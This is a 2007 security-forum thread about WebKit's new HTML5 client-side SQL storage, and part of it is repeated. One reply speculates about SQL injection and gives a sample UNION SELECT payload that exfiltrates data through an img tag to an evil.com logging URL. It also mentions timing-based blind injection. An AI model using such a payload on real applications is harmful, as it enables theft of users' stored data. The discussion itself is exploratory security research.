Paid Advertising
SLA.CKERS.ORG
HA.CKERS SLACKING
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on).
Webkit Nightly Build: Client side database storage
Posted by: fukami (IP Logged)
Date: October 22, 2007 04:09AM
WebKit Does HTML5 Client-side Database Storage: [webkit.org]
Under Mac OS X the sqlite3 databases are stored under ~/Library/Webkit/Databases/
No size limit by now (this may change).
Under Mac OS X the sqlite3 databases are stored under ~/Library/Webkit/Databases/
No size limit by now (this may change).
Re: Webkit Nightly Build: Client side database storage
Posted by: kuza55 (IP Logged)
Date: October 22, 2007 04:45AM
Yay, the API example uses bound parameters: [webkit.org]
So hopefully we won't see (m)any SQL Injection bugs.
Having said that - Who actually needs a client side SQL database?
I agree that we need client side storage, but an SQL database seems a bit overkill - on the other hand too much flexibility is probably better than not enough.
[EDIT]:
I was just wondering about how to do some SQL injection for something like this, attacking a non-blind statement like:
Would probably be go along the lines of this:
Depending on what kind of features it supports, of course (which I haven't looked at yet)
Whereby you leak the data back out via img tags, or other request generating tags.
Blind injection would probably have to be done via timing, since that's really the only thing which leaks over cross-domain boundaries (i.e. using the benchmark or sleep commands or similar).
----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]
Edited 1 time(s). Last edit at 10/22/2007 05:28AM by kuza55.
So hopefully we won't see (m)any SQL Injection bugs.
Having said that - Who actually needs a client side SQL database?
I agree that we need client side storage, but an SQL database seems a bit overkill - on the other hand too much flexibility is probably better than not enough.
[EDIT]:
I was just wondering about how to do some SQL injection for something like this, attacking a non-blind statement like:
SELECT column from table where column2 = '[injection]'
Would probably be go along the lines of this:
SELECT column from table where column2 = '[gibberish]' UNION SELECT concat('<img src="http://www.evil.com/log.php?data=', sensitive_data, '" />') from table where some_other_column = 'whatever'(I've bolded the injection string)
Depending on what kind of features it supports, of course (which I haven't looked at yet)
Whereby you leak the data back out via img tags, or other request generating tags.
Blind injection would probably have to be done via timing, since that's really the only thing which leaks over cross-domain boundaries (i.e. using the benchmark or sleep commands or similar).
----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]
Edited 1 time(s). Last edit at 10/22/2007 05:28AM by kuza55.
Sorry, only registered users may post in this forum.
sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle.
SecTheory Security Consulting *